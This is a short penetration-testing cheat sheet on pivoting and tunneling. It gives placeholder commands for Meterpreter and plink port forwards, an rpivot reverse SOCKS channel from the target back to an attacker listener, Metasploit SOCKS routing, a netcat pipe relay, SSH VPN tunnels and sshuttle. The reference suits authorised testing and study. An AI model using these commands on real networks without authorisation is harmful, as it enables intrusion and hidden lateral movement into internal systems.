Pivoting and Tunneling
Local port forwardâ
portfwd add -l <lport> -p <rport> -r <ip_target>
plink -l root -pw pass -R <lport>:127.0.0.1:<lport> <ip_target> -P <port> -N
ssh -D <lport> -p <rport> <ip_target>
Remote port forwardâ
Rpivotâ
Listener attacker
python server.py --proxy-port <1080> --server-port <80> --server-ip <ip>
Targeted machine
python client.py --server-ip <ip> --server-port <80>
Proxy SOCKSâ
use auxiliary/server/socks4a
run -j
route add <ip/range> <session>
Then use proxychains (Full connected TCP)
ssh -D 127.0.0.1:1080 -i <key> <user>@<target_ip>
Browserâ
chromium --no-sandbox --proxy-server="socks4://<ip>:<port>"
2 Hopsâ
Tunnelingâ
SSH tunnelingâ
Works with socks4/5
plink.exe -v -N -D localhost:<lport> <user>@<ip_target>
In burp: localhost + <lport>
VPN over SSH (not tested)
/etc/ssh/sshd_config
PermitRootLogin yes
PermitTunnel yes
ssh <user>@<ip> -w any:any
Encapsulate UDP in TCP streamâ
socat -v UDP-LISTEN:<4444>,fork TCP:localhost:<4444>
Bypass DPI (not tested)â
http_tunnel
stunnel
Netcat Relayâ
mknod backpipe p
nc -lp <inbound_port> 0<backpipe | nc 127.0.0.1 22 1>backpipe
ssh <login>@<target_machine> -p <inbound_port>
sshuttleâ
sshuttle -r <username>@<sshserver> <target_lan_CIDR>
sshuttle --dns --ssh-cmd 'ssh -i <key>' -r root@<pivot_machine> <target_lan_CIDR>